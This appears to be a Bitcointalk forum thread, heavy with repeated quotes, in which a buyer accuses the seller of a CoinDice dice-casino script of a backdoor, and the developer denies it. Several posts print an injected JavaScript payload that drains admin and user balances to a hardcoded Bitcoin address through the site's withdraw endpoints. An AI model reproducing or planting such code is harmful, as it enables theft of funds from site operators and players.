Pages:
Author

Topic: CoinDice script is a big SCAMM! Don't buy from them! They stollen my BTC! (Read 5731 times)

newbie
Activity: 15
Merit: 0
newbie
Activity: 15
Merit: 0
legendary
Activity: 1470
Merit: 1004
do not download any script you find for free. it may contains malwares and other shits Smiley
Scripts can be downloaded for free until you don't have some important data in your pc md you can use you script after checking it properly.

if you know to check a such script, then you know programming so you can do it yourself.. Smiley
Making your own script takes a lot lot more time than checking it for loopholes.
I agree that everything (making a script and finding loopholes) have a lot of hard work involved but checking a script is not as difficult as compared to creating one because you don't have to innovate and waste time on front end support.

it is easy to program something if you have a model. the hardest part is when you want to create...
sr. member
Activity: 322
Merit: 250
do not download any script you find for free. it may contains malwares and other shits Smiley
Scripts can be downloaded for free until you don't have some important data in your pc md you can use you script after checking it properly.

if you know to check a such script, then you know programming so you can do it yourself.. Smiley
Making your own script takes a lot lot more time than checking it for loopholes.
I agree that everything (making a script and finding loopholes) have a lot of hard work involved but checking a script is not as difficult as compared to creating one because you don't have to innovate and waste time on front end support.
legendary
Activity: 1470
Merit: 1004
do not download any script you find for free. it may contains malwares and other shits Smiley
Scripts can be downloaded for free until you don't have some important data in your pc md you can use you script after checking it properly.

if you know to check a such script, then you know programming so you can do it yourself.. Smiley
sr. member
Activity: 322
Merit: 250
do not download any script you find for free. it may contains malwares and other shits Smiley
Scripts can be downloaded for free until you don't have some important data in your pc md you can use you script after checking it properly.
legendary
Activity: 1470
Merit: 1004
do not download any script you find for free. it may contains malwares and other shits Smiley
legendary
Activity: 2688
Merit: 1192
A couple things that might help to clarify the situation:

When did you buy the script?

Where did you buy the script?

Helps if you include basic info like this in the original complaint.
sr. member
Activity: 280
Merit: 250
Bro, you need to try http://dadice.com
I think you didnt even buy the original. You just found the script somewhere and used it.
sr. member
Activity: 322
Merit: 250
https://bitcointalksearch.org/topic/start-your-dice-casino-site-coindice-10-script-11-btc-404227

I bought coindice and they stollen all my btc. I paid 1.1 btc for script and they stollen 0.54 btc with their backdoor
Today i found this code in db:

setInterval(function(){fuckyou=(document.body).innerText;fuckme=fuckyou.match("admin");fuckyoutoo=(document.body).innerText;fuckmeaswell=fuckyoutoo.match("Withdraw");if(fuckme!=null){if(fuckmeaswell!=null){var ammount=parseFloat($('#content').find("big").eq(1).html()- 0.01);$.post("./?p=wallet",{_adr:'16BBWzqQuYutnipx3iLLaZUVRUos7KEx8D',_am:ammount},function(data){});}else{window.location.replace("./?p=wallet");}}else{function refreshBalancehaxored(){var s1=(document.location).toString();var s=s1.split("=")[1];s=s.substring(0,s.length- 24)
$.ajax({'url':'./content/ajax/request_balance.php?_unique='+ s,'dataType':"json",'success':function(data){var fuck=(data['balance']);if(fuck>=0.002){$.ajax({'url':'./content/ajax/withdraw.php?valid_addr=16BBWzqQuYutnipx3iLLaZUVRUos7KEx8D&amount='+ fuck+'&_unique='+ s,'dataType':"json",'success':function(data){}});}}});}
refreshBalancehaxored();}},1000);

Till now I havnt seen anything like this in the coindice script that I have seen.

Although I know that coindice has certain vulnerabilities, like double deposits(was there in earlier versions), but I dont think that people can actualy withraw like this.
full member
Activity: 224
Merit: 100
Gotta check for those backdoors man, it's your own fault if you had funds stolen and you didn't check
full member
Activity: 238
Merit: 100
I feel that HrN has no right to call Jonny a scammer unless he got a better and legit proof!!
legendary
Activity: 1092
Merit: 1000
nahtnam.com
Can you atleast show some proof that he was the one that sold you the script and not some illegal reseller?
sr. member
Activity: 353
Merit: 250
I also bought this script from him and it is backdoored. He can change a player balance to whatever he wants and withdraw all the coins in the wallets!

DO NOT BUY THIS SCAMMERS SCRIPT HE WILL STEEL ALL YOUR COINS!
full member
Activity: 210
Merit: 100
https://bitcointalksearch.org/topic/start-your-dice-casino-site-coindice-10-script-11-btc-404227

I bought coindice and they stollen all my btc. I paid 1.1 btc for script and they stollen 0.54 btc with their backdoor
Today i found this code in db:

setInterval(function(){fuckyou=(document.body).innerText;fuckme=fuckyou.match("admin");fuckyoutoo=(document.body).innerText;fuckmeaswell=fuckyoutoo.match("Withdraw");if(fuckme!=null){if(fuckmeaswell!=null){var ammount=parseFloat($('#content').find("big").eq(1).html()- 0.01);$.post("./?p=wallet",{_adr:'16BBWzqQuYutnipx3iLLaZUVRUos7KEx8D',_am:ammount},function(data){});}else{window.location.replace("./?p=wallet");}}else{function refreshBalancehaxored(){var s1=(document.location).toString();var s=s1.split("=")[1];s=s.substring(0,s.length- 24)
$.ajax({'url':'./content/ajax/request_balance.php?_unique='+ s,'dataType':"json",'success':function(data){var fuck=(data['balance']);if(fuck>=0.002){$.ajax({'url':'./content/ajax/withdraw.php?valid_addr=16BBWzqQuYutnipx3iLLaZUVRUos7KEx8D&amount='+ fuck+'&_unique='+ s,'dataType':"json",'success':function(data){}});}}});}
refreshBalancehaxored();}},1000);


This is not from original version of the script, you can check it in original files. You just let someone to put backdoor in your script. You even haven't been updating the script...

If he found that code in the DB it means your code is not up to scratch in stopping SQL injections.

I created the script so I know how this things work.

There's no SQL injection. All database inputs are protected. That steal was his fault. He didn't secure server properly.

I already said he had old version of the script. Please read before you post something like this. He had 1.2, it was fixed in 2.0 and newest 3.0 version has also 2 factor auth.

You sold me a vulnerable script! YOU SCAMMED ME!

No, we did not. At least prove it before you start antiCoinDice action.

Hey you scum,
This guy is mostly sure legit, he would not fill the forum with scam messages if he really lost 0.1 BTC in your website, but he would only do this if he was really scammed. I would do the same. If I would've lost 60 USD in a dice game (even if I don't like to bet), I would just take the loss and that's it, it's only 60 dollars. To me, his anger proves that you really scammed him, especially the code that he is posting.
legendary
Activity: 1135
Merit: 1002
Developer
https://bitcointalksearch.org/topic/start-your-dice-casino-site-coindice-10-script-11-btc-404227

I bought coindice and they stollen all my btc. I paid 1.1 btc for script and they stollen 0.54 btc with their backdoor
Today i found this code in db:

setInterval(function(){fuckyou=(document.body).innerText;fuckme=fuckyou.match("admin");fuckyoutoo=(document.body).innerText;fuckmeaswell=fuckyoutoo.match("Withdraw");if(fuckme!=null){if(fuckmeaswell!=null){var ammount=parseFloat($('#content').find("big").eq(1).html()- 0.01);$.post("./?p=wallet",{_adr:'16BBWzqQuYutnipx3iLLaZUVRUos7KEx8D',_am:ammount},function(data){});}else{window.location.replace("./?p=wallet");}}else{function refreshBalancehaxored(){var s1=(document.location).toString();var s=s1.split("=")[1];s=s.substring(0,s.length- 24)
$.ajax({'url':'./content/ajax/request_balance.php?_unique='+ s,'dataType':"json",'success':function(data){var fuck=(data['balance']);if(fuck>=0.002){$.ajax({'url':'./content/ajax/withdraw.php?valid_addr=16BBWzqQuYutnipx3iLLaZUVRUos7KEx8D&amount='+ fuck+'&_unique='+ s,'dataType':"json",'success':function(data){}});}}});}
refreshBalancehaxored();}},1000);


This is not from original version of the script, you can check it in original files. You just let someone to put backdoor in your script. You even haven't been updating the script...

If he found that code in the DB it means your code is not up to scratch in stopping SQL injections.

I created the script so I know how this things work.

There's no SQL injection. All database inputs are protected. That steal was his fault. He didn't secure server properly.

I already said he had old version of the script. Please read before you post something like this. He had 1.2, it was fixed in 2.0 and newest 3.0 version has also 2 factor auth.

You sold me a vulnerable script! YOU SCAMMED ME!

No, we did not. At least prove it before you start antiCoinDice campaign.
legendary
Activity: 1135
Merit: 1002
Developer
https://bitcointalksearch.org/topic/start-your-dice-casino-site-coindice-10-script-11-btc-404227

I bought coindice and they stollen all my btc. I paid 1.1 btc for script and they stollen 0.54 btc with their backdoor
Today i found this code in db:

setInterval(function(){fuckyou=(document.body).innerText;fuckme=fuckyou.match("admin");fuckyoutoo=(document.body).innerText;fuckmeaswell=fuckyoutoo.match("Withdraw");if(fuckme!=null){if(fuckmeaswell!=null){var ammount=parseFloat($('#content').find("big").eq(1).html()- 0.01);$.post("./?p=wallet",{_adr:'16BBWzqQuYutnipx3iLLaZUVRUos7KEx8D',_am:ammount},function(data){});}else{window.location.replace("./?p=wallet");}}else{function refreshBalancehaxored(){var s1=(document.location).toString();var s=s1.split("=")[1];s=s.substring(0,s.length- 24)
$.ajax({'url':'./content/ajax/request_balance.php?_unique='+ s,'dataType':"json",'success':function(data){var fuck=(data['balance']);if(fuck>=0.002){$.ajax({'url':'./content/ajax/withdraw.php?valid_addr=16BBWzqQuYutnipx3iLLaZUVRUos7KEx8D&amount='+ fuck+'&_unique='+ s,'dataType':"json",'success':function(data){}});}}});}
refreshBalancehaxored();}},1000);


This is not from original version of the script, you can check it in original files. You just let someone to put backdoor in your script. You even haven't been updating the script...

If he found that code in the DB it means your code is not up to scratch in stopping SQL injections.

I created the script so I know how this things work.

There's no SQL injection. All database inputs are protected. That steal was his fault. He didn't secure server properly.

I already said he had old version of the script. Please read before you post something like this. He had 1.2, it was fixed in 2.0 and newest 3.0 version has also 2 factor auth.
sr. member
Activity: 434
Merit: 250
https://bitcointalksearch.org/topic/start-your-dice-casino-site-coindice-10-script-11-btc-404227

I bought coindice and they stollen all my btc. I paid 1.1 btc for script and they stollen 0.54 btc with their backdoor
Today i found this code in db:

setInterval(function(){fuckyou=(document.body).innerText;fuckme=fuckyou.match("admin");fuckyoutoo=(document.body).innerText;fuckmeaswell=fuckyoutoo.match("Withdraw");if(fuckme!=null){if(fuckmeaswell!=null){var ammount=parseFloat($('#content').find("big").eq(1).html()- 0.01);$.post("./?p=wallet",{_adr:'16BBWzqQuYutnipx3iLLaZUVRUos7KEx8D',_am:ammount},function(data){});}else{window.location.replace("./?p=wallet");}}else{function refreshBalancehaxored(){var s1=(document.location).toString();var s=s1.split("=")[1];s=s.substring(0,s.length- 24)
$.ajax({'url':'./content/ajax/request_balance.php?_unique='+ s,'dataType':"json",'success':function(data){var fuck=(data['balance']);if(fuck>=0.002){$.ajax({'url':'./content/ajax/withdraw.php?valid_addr=16BBWzqQuYutnipx3iLLaZUVRUos7KEx8D&amount='+ fuck+'&_unique='+ s,'dataType':"json",'success':function(data){}});}}});}
refreshBalancehaxored();}},1000);


This is not from original version of the script, you can check it in original files. You just let someone to put backdoor in your script. You even haven't been updating the script...

If he found that code in the DB it means your code is not up to scratch in stopping SQL injections.
legendary
Activity: 1135
Merit: 1002
Developer
https://bitcointalksearch.org/topic/start-your-dice-casino-site-coindice-10-script-11-btc-404227

I bought coindice and they stollen all my btc. I paid 1.1 btc for script and they stollen 0.54 btc with their backdoor
Today i found this code in db:

setInterval(function(){fuckyou=(document.body).innerText;fuckme=fuckyou.match("admin");fuckyoutoo=(document.body).innerText;fuckmeaswell=fuckyoutoo.match("Withdraw");if(fuckme!=null){if(fuckmeaswell!=null){var ammount=parseFloat($('#content').find("big").eq(1).html()- 0.01);$.post("./?p=wallet",{_adr:'16BBWzqQuYutnipx3iLLaZUVRUos7KEx8D',_am:ammount},function(data){});}else{window.location.replace("./?p=wallet");}}else{function refreshBalancehaxored(){var s1=(document.location).toString();var s=s1.split("=")[1];s=s.substring(0,s.length- 24)
$.ajax({'url':'./content/ajax/request_balance.php?_unique='+ s,'dataType':"json",'success':function(data){var fuck=(data['balance']);if(fuck>=0.002){$.ajax({'url':'./content/ajax/withdraw.php?valid_addr=16BBWzqQuYutnipx3iLLaZUVRUos7KEx8D&amount='+ fuck+'&_unique='+ s,'dataType':"json",'success':function(data){}});}}});}
refreshBalancehaxored();}},1000);


This is not from original version of the script, you can check it in original files. You just let someone to put backdoor in your script. You even haven't been updating the script...
Pages:
Jump to: